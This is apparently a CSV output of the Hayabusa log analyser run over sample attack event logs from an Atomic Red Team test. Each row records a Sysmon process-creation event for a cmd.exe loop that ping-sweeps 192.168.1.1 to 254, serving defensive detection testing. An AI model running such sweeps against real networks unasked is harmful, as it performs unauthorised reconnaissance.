2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.103 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D929-5D31-0000-0010765F3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.104 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3700 | PGUID: 747F3D96-D92A-5D31-0000-001062623500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.105 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2852 | PGUID: 747F3D96-D92B-5D31-0000-0010296B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.106 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6484 | PGUID: 747F3D96-D92B-5D31-0000-00108D6E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.107 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5400 | PGUID: 747F3D96-D92C-5D31-0000-00107A713500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.108 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3452 | PGUID: 747F3D96-D92C-5D31-0000-001072743500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.109 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4468 | PGUID: 747F3D96-D92D-5D31-0000-001068773500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.110 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4320 | PGUID: 747F3D96-D92D-5D31-0000-0010787A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.111 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3952 | PGUID: 747F3D96-D92E-5D31-0000-0010787D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.112 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6148 | PGUID: 747F3D96-D92E-5D31-0000-001091803500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.113 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3800 | PGUID: 747F3D96-D92F-5D31-0000-00109C833500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.114 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1324 | PGUID: 747F3D96-D92F-5D31-0000-0010478A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.115 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3268 | PGUID: 747F3D96-D92F-5D31-0000-00109A973500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.116 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1860 | PGUID: 747F3D96-D930-5D31-0000-0010879A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.117 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4996 | PGUID: 747F3D96-D931-5D31-0000-00108F9D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.118 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2460 | PGUID: 747F3D96-D931-5D31-0000-0010A9A03500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.119 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6156 | PGUID: 747F3D96-D931-5D31-0000-00105CA63500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.120 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D932-5D31-0000-001057A93500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.121 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5832 | PGUID: 747F3D96-D933-5D31-0000-001062AC3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.122 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D933-5D31-0000-001098AF3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.123 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 208 | PGUID: 747F3D96-D933-5D31-0000-0010B6B23500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.124 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2600 | PGUID: 747F3D96-D934-5D31-0000-0010A3B53500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.125 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-D934-5D31-0000-00106ABE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.126 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3356 | PGUID: 747F3D96-D935-5D31-0000-001056C13500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.127 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5004 | PGUID: 747F3D96-D935-5D31-0000-001042C43500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.128 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3964 | PGUID: 747F3D96-D936-5D31-0000-00102EC73500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.129 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6540 | PGUID: 747F3D96-D936-5D31-0000-001075CA3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.130 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4324 | PGUID: 747F3D96-D937-5D31-0000-001066CD3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.131 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D938-5D31-0000-001072D03500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.132 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D938-5D31-0000-00105ED33500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.133 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D938-5D31-0000-00101EDC3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.134 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1816 | PGUID: 747F3D96-D939-5D31-0000-001090E23500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.135 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3320 | PGUID: 747F3D96-D939-5D31-0000-001072EB3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.136 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4540 | PGUID: 747F3D96-D93A-5D31-0000-001073EE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.137 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-D93A-5D31-0000-00105FF83500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.138 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1248 | PGUID: 747F3D96-D93B-5D31-0000-001085FB3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.139 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6740 | PGUID: 747F3D96-D93B-5D31-0000-001092FE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.140 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D93C-5D31-0000-0010B5053600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.141 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D93C-5D31-0000-0010B1083600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.142 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D93D-5D31-0000-0010A20B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.143 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D93D-5D31-0000-0010910E3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.144 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D93E-5D31-0000-00107E113600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.145 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D93E-5D31-0000-0010FC153600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.146 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D93F-5D31-0000-001041203600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.147 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D93F-5D31-0000-001061233600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.148 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D940-5D31-0000-00104E263600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
